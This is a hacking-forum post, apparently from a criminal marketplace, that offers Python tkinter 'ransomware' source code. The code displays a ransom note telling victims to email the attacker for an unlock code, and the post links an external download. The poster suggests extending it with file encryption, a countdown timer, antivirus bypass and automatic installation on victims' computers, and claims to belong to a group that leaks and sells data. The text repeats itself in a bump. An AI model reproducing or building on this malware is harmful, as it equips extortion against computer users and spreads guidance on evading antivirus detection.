OP 08 December, 2025 - 08:18 AM
(This post was last modified: 08 December, 2025 - 08:19 AM by BlackVortex1.)
mega.nz url for source code: https://mega.nz/file/XJ9QGSYD#T8DnC38T-S...02Hv73Xn-U
virustotal url: https://www.virustotal.com/gui/file/4425...5ef1983a19
found 2 out of 63 malicous
just replace YOUR EMAIL GOES HERE with your actual email and you can get the full source code at the mega.nz link
This code creates a GUI window with a ransom note, an input field for the secret code, and a submit button. If the correct code is entered, the window closes, and a success message is displayed. If an incorrect code is entered, an error message is displayed.
you can modify it to do the following below:
encrypt files
display timer
bypass antivirus software
this ransomware is supposed to have no c2 server just contact through email
what it has
displays note
has a spot for email for victim to see
a GUI window
what you have to do
all you have to do is download tkinter and you can modify it to run tkinter automatically to download on victims
computer and it runs
-thank you for your time and have a nice day
This is a bump
virustotal url: https://www.virustotal.com/gui/file/4425...5ef1983a19
found 2 out of 63 malicous
just replace YOUR EMAIL GOES HERE with your actual email and you can get the full source code at the mega.nz link
Code:
import tkinter as tk from tkinter import messagebox class Ransomware: def __init__(self): self.root = tk.Tk() self.root.title("Ransomware") self.label = tk.Label(self.root, text="Your phone has been locked!", font=("Arial", 24)) self.label.pack() self.note = tk.Label(self.root, text="Send an email to YOUR EMAIL GOES HERE for more info on the secret code", font=("Arial", 18)) self.note.pack() self.code_label = tk.Label(self.root, text="Enter secret code:", font=("Arial", 18)) self.code_label.pack() self.code_entry = tk.Entry(self.root, font=("Arial", 18), width=10) self.code_entry.pack() self.button = tk.Button(self.root, text="Submit", command=self.check_code) self.button.pack() def check_code(self): code = self.code_entry.get() if code == "111401": messagebox.showinfo("Correct Code", "Your phone is unlocked!") self.root.destroy() else: messagebox.showerror("Incorrect Code", "Try again!") def run(self): self.root.mainloop() if __name__ == "__main__": ransomware = Ransomware() ransomware.run()you can modify it to do the following below:
encrypt files
display timer
bypass antivirus software
this ransomware is supposed to have no c2 server just contact through email
what it has
displays note
has a spot for email for victim to see
a GUI window
what you have to do
all you have to do is download tkinter and you can modify it to run tkinter automatically to download on victims
computer and it runs
-thank you for your time and have a nice day
This is a bump
I am part of a hacking group known as ShadowByt3$ we leak info and sell info on darkforums.io.